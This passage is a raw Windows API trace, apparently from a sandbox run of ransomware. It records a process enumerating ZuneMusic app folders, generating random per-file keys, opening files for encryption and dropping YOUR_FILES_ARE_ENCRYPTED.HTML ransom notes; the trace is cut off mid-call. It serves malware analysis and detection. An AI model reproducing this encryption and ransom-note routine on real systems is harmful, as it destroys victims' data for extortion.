[0121.060] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.060] CloseHandle (hObject=0x324) returned 1 [0121.061] GetProcessHeap () returned 0x600000 [0121.061] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.061] GetProcessHeap () returned 0x600000 [0121.061] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.061] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6f958d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0121.061] StrStrIW (lpFirst="Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.061] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe") returned 133 [0121.061] GetProcessHeap () returned 0x600000 [0121.061] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.062] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe" [0121.062] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\*" [0121.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6f958d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.063] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6f958d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.063] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0121.063] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.063] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 149 [0121.063] GetProcessHeap () returned 0x600000 [0121.063] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.064] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore" [0121.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0121.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f790, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0121.065] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 1 [0121.065] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2d6b609, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2d6b609, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x311bec0, dwReserved1=0x62f790, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0121.065] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.065] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 169 [0121.065] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.065] lstrlenW (lpString=".dat") returned 4 [0121.065] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.065] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0121.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\microsoft.zunemusic_3.6.13251.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.066] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0121.066] GetProcessHeap () returned 0x600000 [0121.066] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.068] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="7B") returned 2 [0121.068] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="24") returned 2 [0121.068] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="FA") returned 2 [0121.068] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="91") returned 2 [0121.068] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="FD") returned 2 [0121.068] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="A0") returned 2 [0121.068] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="6A") returned 2 [0121.068] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="B1") returned 2 [0121.068] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="72") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="C9") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="1D") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="EA") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="AE") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="DE") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D0") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="CD") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="BD") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="0B") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="7B") returned 2 [0121.069] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="9D") returned 2 [0121.069] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="A8") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="77") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="71") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="24") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="D7") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="62") returned 2 [0121.069] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="7A") returned 2 [0121.069] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="3A") returned 2 [0121.069] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="83") returned 2 [0121.069] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="3E") returned 2 [0121.069] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="6C") returned 2 [0121.069] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="51") returned 2 [0121.070] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0121.070] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.070] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.070] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x71f663, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x71f663, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x311bec0, dwReserved1=0x62f790, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0121.070] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.070] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 174 [0121.070] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.070] lstrlenW (lpString=".LOG1") returned 5 [0121.070] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.070] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x71f663, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x71f663, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f790, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0121.070] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.070] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 174 [0121.070] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.070] lstrlenW (lpString=".LOG2") returned 5 [0121.070] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.070] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x71f663, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x71f663, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62f790, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0121.070] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0121.070] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 179 [0121.070] GetProcessHeap () returned 0x600000 [0121.070] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\microsoft.zunemusic_3.6.13251.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.093] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.094] CloseHandle (hObject=0x31c) returned 1 [0121.094] GetProcessHeap () returned 0x600000 [0121.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.094] GetProcessHeap () returned 0x600000 [0121.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.094] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f958d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6f958d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x71f663, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0121.094] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.094] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 163 [0121.095] GetProcessHeap () returned 0x600000 [0121.095] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\microsoft.zunemusic_3.6.13251.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.096] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.097] CloseHandle (hObject=0x324) returned 1 [0121.097] GetProcessHeap () returned 0x600000 [0121.097] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.097] GetProcessHeap () returned 0x600000 [0121.097] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.099] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.099] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.099] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState") returned 95 [0121.099] GetProcessHeap () returned 0x600000 [0121.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.099] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState" [0121.099] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\*" [0121.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.100] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.100] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 0 [0121.100] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.100] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.100] GetProcessHeap () returned 0x600000 [0121.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 